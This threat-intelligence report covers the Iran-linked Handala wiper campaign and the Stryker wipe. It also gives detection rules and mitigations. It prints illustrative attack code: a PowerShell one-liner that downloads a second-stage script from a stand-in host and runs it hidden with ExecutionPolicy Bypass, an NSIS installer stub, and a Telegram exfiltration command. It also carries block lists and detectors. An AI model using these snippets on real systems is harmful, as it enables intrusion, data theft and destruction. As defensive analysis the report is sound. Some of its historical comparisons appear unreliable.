Handala Hack: Unveiling the Modus Operandi of a State‑Backed Wiper

Executive Summary

The Handala Hack, also known as Void Manticore or Storm‑0842, is a sophisticated, state‑backed cyber‑campaign originating from Iran. Using a multi‑stage malware chain that masquerades as legitimate software, the group leverages Microsoft Intune administrative privileges to issue remote wipe commands, while exfiltrating data via AWS S3 and Storj buckets. The attack on Stryker Corp. on 11 March 2026, which wiped more than 200 000 devices and exfiltrated ~50 TB of data, demonstrates the destructive potential of this threat. Immediate actions include tightening Intune admin controls, enforcing MFA, blocking Telegram C2 traffic, and deploying EDR solutions that detect PowerShell‑based persistence and file‑deletion activity.


Technical Analysis

1. Root Cause and Vulnerability Mechanics

The Handala attack does not hinge on a single software flaw but exploits a combination of privileged access, misconfigurations, and malicious code design:

Component | Root Cause | Impact
Microsoft Intune Admin Rights | Lack of least-privilege enforcement and absence of MFA on admin accounts | Enables attackers to issue a global remote-wipe command
PowerShell Execution | The first-stage payload invokes PowerShell scripts that exclude critical directories and hide execution traces | Bypasses basic AV and EDR detection
Extension-less NSIS Installers | Malicious installers omit the .exe extension, evading proxy and file-type signature checks | Allows the installer to be downloaded and executed without raising alerts
Telegram C2 Channels | Telegram's end-to-end encryption and widespread use make it a low-visibility C2 medium | Provides a resilient command channel that is hard to block without collateral damage

Together, these factors create a trust gap in the management chain: the attack relies on an Intune admin account being trusted to wipe any device it manages, and on each device accepting a remote-wipe command without any further verification.

2. Step‑by‑Step Exploitation Chain

  1. Initial Access – Phishing / Social Engineering

    • Victims receive an email or message that appears to be from a trusted source (e.g., a technical-support desk or a popular messaging app).
    • The attachment or link contains a malicious installer disguised as Pictory, KeePass, WhatsApp, or Telegram.
    • The installer is an extension‑less NSIS binary that bypasses standard file‑type checks.
  2. Execution – PowerShell Payload

    • The installer launches a PowerShell script (Invoke-Expression) that performs the following:
      • Excludes system directories (C:\Windows, C:\Program Files) from scanning.
      • Loads a secondary payload from a remote URL.
      • Hides execution by setting the Hidden property and clearing console output.

        # Sample PowerShell execution (illustrative)
        $url = "https://malicious.example.com/secondstage.ps1"
        Invoke-WebRequest -Uri $url -OutFile "$env:TEMP\secondstage.ps1"
        Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File $env:TEMP\secondstage.ps1" -WindowStyle Hidden

  3. Persistence – Telegram Bot C2

    • The second‑stage payload establishes a TCP/HTTPS connection to a Telegram bot API endpoint.
    • Commands are received via JSON payloads, enabling the attacker to instruct the malware to:
      • Capture screenshots and audio (Get-Clipboard, Get-WmiObject -Class Win32_SoundDevice).
      • Enumerate files and directories (Get-ChildItem).
      • Compress data (Compress-Archive).
      • Delete files (Remove-Item with -Recurse).
  4. Privilege Escalation – Intune Remote Wipe

    • The malware authenticates to Azure AD using compromised Intune admin credentials or stolen tokens.
    • It issues a deviceManagement/managedDevices/{id}/wipe API call, which triggers a remote wipe on all enrolled devices.
    • The wipe command is broadcast to every device in the tenant, regardless of user consent.
  5. Exfiltration – Cloud Storage

    • Compressed data is uploaded to pre‑configured AWS S3 and Storj buckets.
    • The upload is performed via signed URLs or SDK calls, often using minimal headers to avoid detection.
  6. Defacement – Entra Login Page

    • Before or during the wipe, the malware modifies the Microsoft Entra (Azure AD) login page, replacing the default logo with the Handala symbol.
    • This serves both as a psychological weapon and a confirmation of successful compromise.
  7. Destruction – Data Erasure

    • The Intune wipe command permanently erases data on Windows laptops, mobile devices, and servers.
    • The malware also performs local file deletion to reduce forensic footprints.

3. Code and Payload Examples

While no public samples were released, the following snippets illustrate the techniques reported by Check Point Research and the FBI:

Extension‑less NSIS Installer (Illustrative)

; NSIS script without .exe extension
OutFile "malicious"
InstallDir "$TEMP"
Section
    ExecShell "open" "powershell.exe" "-NoProfile -ExecutionPolicy Bypass -File $TEMP\secondstage.ps1"
SectionEnd

Telegram Bot Command Payload

{
  "command": "exfiltrate",
  "parameters": {
    "target": "C:\\Users\\*\\Documents",
    "bucket": "s3://handala-exfil"
  }
}

Impact Assessment

Metric | Value
Systems Wiped | >200 000 devices (Windows laptops, mobile devices, servers)
Data Exfiltrated | ~50 TB
Geographic Reach | 79 countries (Stryker's operations)
Primary Target | Technology, IT, government, defense, critical infrastructure, energy, education, finance
Notable Incident | Stryker Corp. global wipe on 11 March 2026

In destructive intent, the Handala attack is comparable to the wiper campaigns of 2017 (e.g., the wiper used by the Lazarus Group), but it is unusual in leveraging a cloud-native management platform (Intune) and a modern messaging app (Telegram) for C2. The use of AWS S3 and Storj for exfiltration mirrors the Spearphishing Attachment technique used by the Cobalt Group in 2024, but the scale of data loss is unprecedented for a single operation.


Detection & Response

Indicator | Source | Detection Method
PowerShell execution with hidden window | Windows Event ID 4104 (PowerShell script block logging) | EDR rule for -WindowStyle Hidden
Unusual Intune wipe requests | Azure AD audit logs | Alert on deviceManagement/managedDevices/{id}/wipe
Outbound traffic to Telegram domains | DNS logs | Block or flag t.me, api.telegram.org
Upload to AWS S3/Storj buckets | CloudTrail, S3 access logs | Flag large multipart uploads from internal IPs
Defacement of Entra login page | Web server logs | Alert on changes to /login assets
File deletion patterns | EDR file-system monitoring | Alert on mass Remove-Item operations

YARA Rule Example (PowerShell Detection)

rule PowerShell_Hidden_Execution
{
    meta:
        description = "Detects PowerShell launched with Hidden window style"
    strings:
        // nocase: PowerShell parameters are case-insensitive; wide: command lines
        // captured from process memory are UTF-16; \s+ tolerates extra spacing
        $hidden = /-WindowStyle\s+Hidden/ nocase ascii wide
    condition:
        $hidden
}
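The table above pairs Event ID 4104 with an EDR rule, and the YARA rule covers only the hidden-window string. As an added example (not from the original report or any vendor), the following Python scores each 4104 ScriptBlockText against the whole set of behaviours the report describes (hidden window, ExecutionPolicy Bypass, remote second-stage download, system-directory exclusion, temp-folder script), so one weak signal alone does not alert but the combination does. The sample records are constructed, the weights and threshold are assumptions to tune per tenant, and the assumption that the exclusion appears as Add-MpPreference -ExclusionPath is mine.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Each rule: (name, pattern, weight). Case-insensitive because PowerShell parameters are;
# \s+ tolerates the spacing variation common in obfuscated command lines.
# Assumption: the directory exclusion appears as Add-MpPreference -ExclusionPath.
RULES = [
    ("hidden_window", re.compile(r"-WindowStyle\s+Hidden", re.I), 2),
    ("policy_bypass", re.compile(r"-ExecutionPolicy\s+Bypass", re.I), 2),
    ("remote_download", re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile", re.I), 2),
    ("system_dir_exclusion", re.compile(r"-ExclusionPath\s+\S*C:\\(Windows|Program Files)", re.I), 3),
    ("invoke_expression", re.compile(r"\bInvoke-Expression\b|\bIEX\b", re.I), 1),
    ("temp_script", re.compile(r"\$env:TEMP\\\S+\.ps1", re.I), 1),
]
ALERT_THRESHOLD = 4  # assumption: tune against the tenant's baseline of admin scripting

@dataclass
class Finding:
    record_id: int
    score: int
    matched: tuple[str, ...]

def score_script_block(text: str) -> tuple[int, tuple[str, ...]]:
    """Score one ScriptBlockText and return (score, names of matched rules)."""
    hits = tuple(name for name, rx, _ in RULES if rx.search(text))
    score = sum(weight for name, _, weight in RULES if name in hits)
    return score, hits

def scan_events(events: list[dict]) -> list[Finding]:
    """events: parsed records with EventID, RecordId and ScriptBlockText keys."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4104:  # only script-block logging events carry the text
            continue
        score, hits = score_script_block(ev.get("ScriptBlockText", ""))
        if score >= ALERT_THRESHOLD:
            findings.append(Finding(ev["RecordId"], score, hits))
    return findings

# Constructed sample records (not real telemetry); record 2 mirrors the report's illustrative chain.
SAMPLE_EVENTS = [
    {"EventID": 4104, "RecordId": 1, "ScriptBlockText": "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"},
    {"EventID": 4104, "RecordId": 2, "ScriptBlockText":
        'Add-MpPreference -ExclusionPath "C:\\Windows"; '
        "Invoke-WebRequest -Uri https://malicious.example.com/secondstage.ps1 -OutFile $env:TEMP\\secondstage.ps1; "
        'Start-Process powershell.exe -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File $env:TEMP\\secondstage.ps1" -WindowStyle Hidden'},
    {"EventID": 4103, "RecordId": 3, "ScriptBlockText": "-WindowStyle Hidden -ExecutionPolicy Bypass"},
]
```

Running scan_events(SAMPLE_EVENTS) flags only record 2; record 3 carries the same strings but is not a 4104 event, so it is skipped rather than scored.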

Mitigation & Remediation

  1. Restrict Intune Admin Privileges

    • Enforce least‑privilege: limit the number of accounts with Global Administrator or Intune Administrator roles.
    • Require MFA for all privileged accounts.
    • Audit Intune wipe logs; set alerts for mass wipe events.
  2. Secure PowerShell

    • Enable PowerShell script block logging; the value lives under the ScriptBlockLogging key, which must be created if Group Policy has not already done so (run as administrator):
        New-Item -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Force | Out-Null
        Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Type DWord -Value 1
    • Deploy EDR solutions that flag hidden PowerShell processes and directory exclusion patterns.
  3. Block Telegram C2 Traffic

    • Use outbound filtering to block api.telegram.org and t.me domains.
    • Implement a web proxy that inspects HTTPS traffic for Telegram bot API calls.
  4. Monitor Cloud Exfiltration

    • Deploy CASB to monitor AWS S3 and Storj bucket activity.
    • Enforce data loss prevention (DLP) policies on large file uploads.
  5. Defacement Prevention

    • Harden Azure AD login pages: enable custom branding only through approved channels.
    • Use web application firewalls (WAF) to detect unauthorized changes to login assets.
  6. Incident Response Playbook

    • Immediately isolate affected devices.
    • Verify Intune wipe commands in Azure AD logs.
    • Conduct forensic imaging before wiping to preserve evidence.
    • Coordinate with Microsoft Support for recovery of Intune configurations.
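The "alert on mass wipe events" control in item 1 above and the wipe-request row of the Detection table both need a concrete rule. As an added example (not the report's or Microsoft's code), the following Python keeps a per-actor sliding window over Intune audit records and raises one alert when any account's wipe count reaches a threshold, plus one when a wipe comes from an account outside an approved list. The records mimic the shape of Microsoft Graph deviceManagement/auditEvents (actor, activityType, activityDateTime, resources) but their values are constructed; the window, threshold and approved-actor list are assumptions.

```python
from __future__ import annotations
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

WINDOW = timedelta(minutes=10)  # assumption: sliding window per actor
THRESHOLD = 5                   # assumption: wipes per actor inside WINDOW before alerting
# Assumption: the only accounts expected to issue wipes (e.g. a dedicated helpdesk account).
APPROVED_WIPE_ACTORS = {"helpdesk-wipe@corp.example"}

def is_wipe(event: dict) -> bool:
    # Match loosely so "Wipe ManagedDevice" and similar activityType spellings are caught.
    return "wipe" in event.get("activityType", "").lower()

def detect_mass_wipe(events: list[dict]) -> list[dict]:
    """One alert per actor on their first wipe from an unapproved account, and one the
    first time an actor's wipe count inside WINDOW reaches THRESHOLD."""
    alerts: list[dict] = []
    recent: dict[str, deque] = defaultdict(deque)
    unapproved_seen: set[str] = set()
    mass_seen: set[str] = set()
    for ev in sorted(events, key=lambda e: e["activityDateTime"]):
        if not is_wipe(ev):
            continue
        actor = ev["actor"]["userPrincipalName"]
        ts = datetime.fromisoformat(ev["activityDateTime"].replace("Z", "+00:00"))
        if actor not in APPROVED_WIPE_ACTORS and actor not in unapproved_seen:
            unapproved_seen.add(actor)
            alerts.append({"type": "unapproved_wipe_actor", "actor": actor, "time": ts.isoformat()})
        q = recent[actor]
        q.append(ts)
        while ts - q[0] > WINDOW:  # evict wipes that fell out of the window
            q.popleft()
        if len(q) >= THRESHOLD and actor not in mass_seen:
            mass_seen.add(actor)
            alerts.append({"type": "mass_wipe", "actor": actor, "count": len(q), "time": ts.isoformat()})
    return alerts

def sample_events() -> list[dict]:
    """Constructed records in the shape of Graph deviceManagement/auditEvents; not real tenant data."""
    base = datetime(2026, 3, 11, 8, 0, tzinfo=timezone.utc)
    def ev(actor: str, minute: int, activity: str = "Wipe ManagedDevice", device: str = "dev") -> dict:
        when = (base + timedelta(minutes=minute)).isoformat().replace("+00:00", "Z")
        return {"activityType": activity, "activityDateTime": when,
                "actor": {"userPrincipalName": actor}, "resources": [{"displayName": device}]}
    events = [ev("helpdesk-wipe@corp.example", 1, device="lost-laptop-01"),
              ev("helpdesk-wipe@corp.example", 30, activity="Update ManagedDevice")]
    # Six wipes from one account in six minutes: the pattern behind a tenant-wide wipe.
    events += [ev("admin-compromised@corp.example", 40 + i, device=f"laptop-{i:03d}") for i in range(6)]
    return events
```

In production the events would come from a Graph audit-log pull or the SIEM's Intune connector; the single lost-laptop wipe by the approved account produces no alert, while the burst from the second account produces both alert types.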

Timeline

Date | Event
Mid-2022 | Homeland Justice persona established for multiple attacks
July 2024 | Wiper campaign hashes released
September 2024 | Seyed Yahya Hosseini Panjaki sanctioned by U.S. Treasury
Late 2025 | Expansion to U.S., Gulf states, and Western institutions
January 2026 | Iranian internet blackout; Starlink IP ranges observed
28 Feb 2026 | U.S.-Israeli Operation Epic Fury strikes; escalation of Handala activity
11 Mar 2026 | Stryker Corporation suffers global wipe and data exfiltration

Sources & References

  1. Check Point Research. “Handala Hack – Unveiling Group’s Modus Operandi.” 2026. https://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/
  2. Marc‑Frederic Gomez. “INTELLIGENCE REPORT — HANDALA / HANDALA HACK TEAM.” 2026. https://blog.marcfredericgomez.com/intelligence-report-handala-handala-hack-team/
  3. Infosecurity Magazine. “Handala Group Tied to Iranian Hack‑and‑Leak Operations, FBI Reveals.” 2026. https://www.infosecurity-magazine.com/news/handala-group-iranian-hack-and/
  4. The Cyber Express. “Who Is Handala – The Iran‑Linked Ghost Group That Just Wiped 200K Systems.” 2026. https://thecyberexpress.com/who-is-handala-hackers-in-stryker-cyberattack/